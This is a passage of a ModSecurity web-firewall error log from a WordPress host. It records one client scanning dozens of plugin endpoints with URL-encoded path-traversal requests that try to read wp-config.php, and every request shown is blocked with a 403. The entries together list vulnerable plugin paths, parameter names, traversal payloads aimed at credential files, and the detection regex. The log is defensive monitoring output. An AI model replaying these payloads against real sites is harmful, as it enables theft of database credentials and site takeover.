/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php"] [unique_id "ZEeeiz754oNYNW-15_AYYgAAAAk"] [Tue Apr 25 04:34:03.462977 2023] [:error] [pid 15578:tid 140447099905792] [client 37.120.213.169:41422] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php?abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php"] [unique_id "ZEeeiz754oNYNW-15_AYYwAAAAc"] [Tue Apr 25 04:34:03.598731 2023] [:error] [pid 15578:tid 140447219951360] [client 37.120.213.169:41424] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php?abspath=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/annonces/includes/lib/photo/uploadPhoto.php"] [unique_id "ZEeeiz754oNYNW-15_AYZAAAAAE"] [Tue Apr 25 04:34:03.724076 2023] [:error] [pid 15578:tid 140447211558656] [client 37.120.213.169:41426] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/apptha-slider-gallery/asgallDownload.php?imgname=..%2F..%2F..%2Fwp-load.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/apptha-slider-gallery/asgallDownload.php"] [unique_id "ZEeeiz754oNYNW-15_AYZQAAAAI"] [Tue Apr 25 04:34:03.851375 2023] [:error] [pid 15578:tid 140447228344064] [client 37.120.213.169:41430] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZEeeiz754oNYNW-15_AYZgAAAAA"] [Tue Apr 25 04:34:03.977536 2023] [:error] [pid 15578:tid 140447091513088] [client 37.120.213.169:41432] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZEeeiz754oNYNW-15_AYZwAAAAg"] [Tue Apr 25 04:34:04.103434 2023] [:error] [pid 15578:tid 140447032764160] [client 37.120.213.169:41436] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/bookx/includes/bookx_export.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/bookx/includes/bookx_export.php"] [unique_id "ZEeejD754oNYNW-15_AYaAAAAA8"] [Tue Apr 25 04:34:04.230940 2023] [:error] [pid 15578:tid 140447049549568] [client 37.120.213.169:41438] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/brandfolder/callback.php?wp_abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZEeejD754oNYNW-15_AYaQAAAA0"] [Tue Apr 25 04:34:04.363554 2023] [:error] [pid 15578:tid 140446982407936] [client 37.120.213.169:41440] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZEeejD754oNYNW-15_AYagAAABU"] [Tue Apr 25 04:34:04.490342 2023] [:error] [pid 15578:tid 140446965622528] [client 37.120.213.169:41444] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php"] [unique_id "ZEeejD754oNYNW-15_AYawAAABc"] [Tue Apr 25 04:34:04.615705 2023] [:error] [pid 15889:tid 140447186380544] [client 37.120.213.169:41450] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php"] [unique_id "ZEeejF4G6tVEc6w5Us7gdgAAAMU"] [Tue Apr 25 04:34:04.743188 2023] [:error] [pid 15580:tid 140447083120384] [client 37.120.213.169:41452] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZEeejN-GjcOLRjW9Sa4WBwAAAIk"] [Tue Apr 25 04:34:04.879115 2023] [:error] [pid 15889:tid 140447108298496] [client 37.120.213.169:41458] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/disclosure-policy-plugin/functions/action.php"] [unique_id "ZEeejF4G6tVEc6w5Us7gdwAAAMY"] [Tue Apr 25 04:34:05.006266 2023] [:error] [pid 15580:tid 140447108298496] [client 37.120.213.169:41460] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=..%2F..%2F..%2Fwp-config.php&currdir=%2Fwp-content%2Fplugins%2Fdm-albums%2F"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dm-albums/dm-albums.php"] [unique_id "ZEeejd-GjcOLRjW9Sa4WCAAAAIY"] [Tue Apr 25 04:34:05.131831 2023] [:error] [pid 15889:tid 140447211558656] [client 37.120.213.169:41464] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dm-albums/template/album.php"] [unique_id "ZEeejV4G6tVEc6w5Us7geAAAAMI"] [Tue Apr 25 04:34:05.258604 2023] [:error] [pid 15889:tid 140446999193344] [client 37.120.213.169:41468] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dukapress/lib/dp_image.php?src=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dukapress/lib/dp_image.php"] [unique_id "ZEeejV4G6tVEc6w5Us7geQAAANM"] [Tue Apr 25 04:34:05.384742 2023] [:error] [pid 15889:tid 140447066334976] [client 37.120.213.169:41472] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZEeejV4G6tVEc6w5Us7gegAAAMs"] [Tue Apr 25 04:34:05.521662 2023] [:error] [pid 15889:tid 140447024371456] [client 37.120.213.169:41476] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/filedownload/download.php/?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/filedownload/download.php/"] [unique_id "ZEeejV4G6tVEc6w5Us7gewAAANA"] [Tue Apr 25 04:34:05.647325 2023] [:error] [pid 15578:tid 140447024371456] [client 37.120.213.169:41478] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-mp3-audio-player/direct_download.php"] [unique_id "ZEeejT754oNYNW-15_AYbAAAABA"] [Tue Apr 25 04:34:05.775553 2023] [:error] [pid 15889:tid 140447091513088] [client 37.120.213.169:41484] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZEeejV4G6tVEc6w5Us7gfAAAAMg"] [Tue Apr 25 04:34:05.904590 2023] [:error] [pid 15889:tid 140447074727680] [client 37.120.213.169:41486] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php"] [unique_id "ZEeejV4G6tVEc6w5Us7gfQAAAMo"] [Tue Apr 25 04:34:06.030574 2023] [:error] [pid 15889:tid 140447015978752] [client 37.120.213.169:41488] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZEeejl4G6tVEc6w5Us7gfgAAANE"] [Tue Apr 25 04:34:06.158335 2023] [:error] [pid 15889:tid 140447057942272] [client 37.120.213.169:41490] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file 